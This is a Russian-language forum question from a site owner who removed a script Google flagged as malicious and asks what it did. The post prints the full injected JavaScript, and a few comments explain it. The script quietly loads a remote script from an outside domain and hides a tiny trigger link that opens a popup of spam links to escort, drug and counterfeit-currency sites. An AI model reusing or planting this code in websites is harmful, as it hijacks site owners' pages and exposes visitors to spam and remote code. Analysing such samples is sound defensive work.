# Что делал этот вредонос на сайте?

Tags: javascript

Gрислали письмо (от Google) в котором говорилось что на сайте вредноносное по.Скрипт нашли и удалили. Но очень интересно что он делал

```
function() {
    'use strict';

    if (window['shbNetLoaded']) return;
    window['shbNetLoaded'] = true;

    var popupHtml = "<div id=\"shbNetPaddingWr\" class=\"shbNetPopupWr\" style=\"display:none;\"> <table id=\"shbNetPaddingTable\" class=\"shbNetPopupTable\" style=\"display:none;\" width=\"100%\" height=\"100%\" cellspacing=\"0\" cellpadding=\"0\"> <tr style=\"background:none;\"> <td id=\"shbNetPopupCell\" class=\"shbNetPopupCell\"> <div id=\"shbNetPaddingPopup\" class=\"shbNetPopup\"> <div> <div style=\"padding:15px 0 0 0;\"> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/eskort-istanbulda.com\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">escort travesti anadolu yakas\u0131<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">eskort-istanbulda.com<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/legalcannabisonlinedispensary.com\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">online dispensary uk shipping<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">legalcannabisonlinedispensary.com<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/www.cleardental.com.au\/services\/emergency-dentistry\/dental-trauma-to-periodontal-tissues.html\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">occlusal trauma disease<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">www.cleardental.com.au<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/bridgechurchnyc.com\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">brooklyn church of christ<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">bridgechurchnyc.com<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/coinloan.io\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">monero loans usa<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">coinloan.io<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/www.rentalbrasil.com.br\/aluguel-mesas-vidro-festas-eventos.php\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">aluguel de mesa de vidro para casamento<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">www.rentalbrasil.com.br<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/361sport.com.ua\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">\u043e\u0434\u0435\u0441\u0441\u0430 \u043e\u0431\u0443\u0432\u044c \u043e\u043f\u0442<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">361sport.com.ua<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/techlandlab.pl\/sklep\/kwas-l-askorbinowy-e300\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">kwas l-askorbinowy<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">techlandlab.pl<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/www.colemanfilter.com\/catalog\/high-flow-filters-torpedo-inside-out-flow\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">peco filters cartridges<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">www.colemanfilter.com<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/www.vaporsrus.net\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">big vaporizer tank<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">www.vaporsrus.net<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/www.argonstore.ca\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">industrial sticker labels<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">www.argonstore.ca<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/womenmagazine.kiev.ua\/shop\/1828\/desc\/trusiki-viktoria-secret-513-oranzhevye\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">\u043e\u0440\u0430\u043d\u0436\u0435\u0432\u044b\u0435 \u0442\u0440\u0443\u0441\u0438\u043a\u0438<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">womenmagazine.kiev.ua<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/www.iqmatics.com\/webstore\/department.aspx?depId=111\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">glass dining table rectangle<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">www.iqmatics.com<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/myswissmailaddress.com\/de\/adresse-in-der-schweiz-nur-nachsendung-der-post\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">briefumschlag adressieren schweiz<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">myswissmailaddress.com<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/www.densityplus.com\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">como tener el pelo brillante hombres<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">www.densityplus.com<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/maraldi.com.ua\/shuby\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">\u0448\u0443\u0431\u0430 \u043d\u043e\u0440\u043a\u0430 \u043c\u0435\u0445\u0430<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">maraldi.com.ua<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/www.undetectablecounterfeits.com\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">detect counterfeit american currency values<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">www.undetectablecounterfeits.com<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/ladynight.com.ua\/korsetu\/korset-renessans-476\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">\u0440\u0435\u043d\u0435\u0441\u0441\u0430\u043d\u0441 \u0431\u0435\u043b\u0430\u044f \u0446\u0435\u0440\u043a\u043e\u0432\u044c<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">ladynight.com.ua<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/nhilong.com\/9-phong-cach-thiet-ke-noi-that-pho-bien-nhat\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">b\u1eb1ng thi\u1ebft k\u1ebf n\u1ed9i th\u1ea5t<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">nhilong.com<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/wooden.kiev.ua\/linden_lining_for_sauna_and_bath_from_producer.html\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">\u0434\u043b\u0438\u043d\u0430 \u0432\u0430\u0433\u043e\u043d\u043a\u0438 \u0434\u043b\u044f \u0441\u0430\u0443\u043d\u044b<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">wooden.kiev.ua<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/makasiny-v-cvetochek.obuv.net.ua\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">\u043c\u0430\u043a\u0430\u0441\u0438\u043d\u044b \u0432 \u0446\u0432\u0435\u0442\u043e\u0447\u0435\u043a<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">makasiny-v-cvetochek.obuv.net.ua<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/antonio-banderas-sekret.monami.kiev.ua\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">\u0430\u043d\u0442\u043e\u043d\u0438\u043e \u0431\u0430\u043d\u0434\u0435\u0440\u0430\u0441 \u0441\u0435\u043a\u0440\u0435\u0442<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">antonio-banderas-sekret.monami.kiev.ua<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/laki-dlya-nogtey-ceny.nailshop.net.ua\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">\u043b\u0430\u043a\u0438 \u0434\u043b\u044f \u043d\u043e\u0433\u0442\u0435\u0439 \u0446\u0435\u043d\u044b<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">laki-dlya-nogtey-ceny.nailshop.net.ua<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/www.limosstl.com\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">limo st louis<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">www.limosstl.com<\/span> <\/div> <\/div> <\/div> <div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/batumiexpert.com\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">batumiexpert.com<\/span> <\/div> <\/div> <div style=\"display:inline-block; width:49%; padding:0 0 5px; vertical-align:top;\" data-type=\"api\" data-custom=\"\"> <div style=\"max-width:95%;\"> <a href=\"https:\/\/freshgate.com.ua\/\" target=\"_blank\" style=\"color:#737373; font-size:12px; font-weight:bold; text-transform:capitalize;\">\u0434\u0435\u0437\u0438\u043d\u0444\u0435\u043a\u0442\u043e\u0440<\/a> <\/div> <div style=\"max-width:95%;\"> <span style=\"color:#9a9a9a; font-size:12px;\">freshgate.com.ua<\/span> <\/div> <\/div> <\/div> <div style=\"clear:both;\"><\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>";
    var popupCreated = false;

    function onReady() {
        tryCreatePopup(2);

        var box = create('div');
        append(box, document.body);

        var defaultStyles = {
            width: '1px',
            height: '1px',
            background: 'transparent',
            display: 'inline-block',
            margin: '2px',
            padding: 0,
            verticalAlign: 'bottom',
            border: 'none'
        };

        var a = create('a');
        css(a, defaultStyles);

        document.addEventListener('keydown', function(e) {
            if (e.keyCode === 192 && e.ctrlKey) {
                css(a, {
                    width: '20px',
                    height: '20px',
                    background: '#fff',
                    border: '1px solid red'
                });
            }
        });

        document.addEventListener('keyup', function(e) {
            css(a, defaultStyles);
        });

        a.className = 'shbNetgpLink';
        append(a, box);

        a.href = 'javascript:;';
        on(a, 'click', openLinerPopup);

        css(box, {
            position: 'fixed',
            margin: 0,
            padding: 0,
            outline: 'none',
            border: 'none',
            zIndex: 999999999,
            overflow: 'visible',
            direction: 'ltr'
        });

        css(box, {
            left: '3px',
            right: 'auto',
            top: '50px',
            bottom: 'auto',
            width: '42px',
            height: '168px'
        });
    }

    function clearStyles() {
        if(typeof document.createStyleSheet === 'undefined') {
            document.createStyleSheet = (function() {
                function createStyleSheet(href) {
                    if(typeof href !== 'undefined') {
                        var element = document.createElement('link');
                        element.type = 'text/css';
                        element.rel = 'stylesheet';
                        element.href = href;
                    } else {
                        var element = document.createElement('style');
                        element.type = 'text/css';
                    }

                    document.getElementsByTagName('head')[0].appendChild(element);
                    var sheet = document.styleSheets[document.styleSheets.length - 1];

                    if(typeof sheet.addRule === 'undefined')
                        sheet.addRule = addRule;

                    if(typeof sheet.removeRule === 'undefined')
                        sheet.removeRule = sheet.deleteRule;

                    return sheet;
                }

                function addRule(selectorText, cssText, index) {
                    if(typeof index === 'undefined')
                        index = this.cssRules.length;

                    this.insertRule(selectorText + ' {' + cssText + '}', index);
                }

                return createStyleSheet;
            })();
        }

        var sheet = document.createStyleSheet();
        sheet.addRule('#shbNetPaddingTable', 'display: none;');
        sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;');
        sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;');
        sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;');
        sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;');
        sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;');
    }

    function tryCreatePopup(stage) {
        if (popupCreated) return;

        if (stage === 1) {
            document.writeln(popupHtml);
        } else if (stage === 2) {
            var mainBox = create('div');
            mainBox.innerHTML = popupHtml;
            document.body.appendChild(mainBox);
        } else {
            return;
        }

        var wr = $('shbNetPaddingWr');
        if (!wr) return;

        popupCreated = true;

        var table = $('shbNetPaddingTable');
        css(table, {
            position: 'fixed',
            margin: 0,
            padding: 0,
            left: 0,
            top: 0,
            width: '100%',
            height: '100%',
            direction: 'ltr',
            zIndex: 999999999,
            background: 'none'
        });
        css(table.getElementsByTagName('td')[0], {
            verticalAlign: 'middle',
            background: 'rgba(0, 0, 0, 0.5)'
        });

        var popup = $('shbNetPaddingPopup');
        css(popup, {
            margin: '0 auto',
            padding: '20px 25px 20px',
            width: '437px',
            background: '#fff',
            border: '1px solid #000',
            textAlign: 'left',
            position: 'relative',
            fontFamily: 'Tahoma, Arial, Verdana',
            boxSizing: 'content-box'
        });

        on(document, 'keydown', function(e) {
            if (e.keyCode === 27) {
                wr.style.display = 'none';
            }
        });
    }

    function removeClass(node, className) {
        if (node && node.className) {
            node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), '');
        }
    }

    function openLinerPopup() {
        var pad = $('shbNetPaddingWr');
        var tbl = $('shbNetPaddingTable');
        if (!pad || !tbl) return;

        pad.style.display = 'block';
        tbl.style.display = 'table';

        var mainPopup = $('shbNetPopupWr');
        if (!mainPopup) return;

        mainPopup.style.display = 'none';
    }

    function $(id) {
        return document.getElementById(id);
    }

    function on(elem, event, handler) {
        elem.addEventListener(event, handler, false);
    }

    function css(elem, style) {
        for (var prop in style) {
            elem.style[prop] = style[prop];
        }
    }

    function create(tag) {
        return document.createElement(tag);
    }

    function append(elem, parent) {
        parent.appendChild(elem);
    }

    setTimeout(function() {
        window.CJSource = 'shb2';
        var script = document.createElement('script');
        script.src = 'https://cleverjump.org/counter.js';
        (document.head || document.body).appendChild(script);
    }, 10);

    if (document.readyState === 'complete' || document.readyState === 'interactive') {
        onReady();
    } else {
        on(document, 'DOMContentLoaded', onReady);
    }

    tryCreatePopup(1);

    try {
        clearStyles();
    } catch (ex) {}
})();
```

Comment: `shbNetLoaded` это что такое ?

Comment: @MaximLensky похоже на проверку того, что этот код уже тут был

Comment: Этот плагин пытается вызвать попап со множеством ссылок на сторонние ресурсы.

Comment: @InDevX спасибо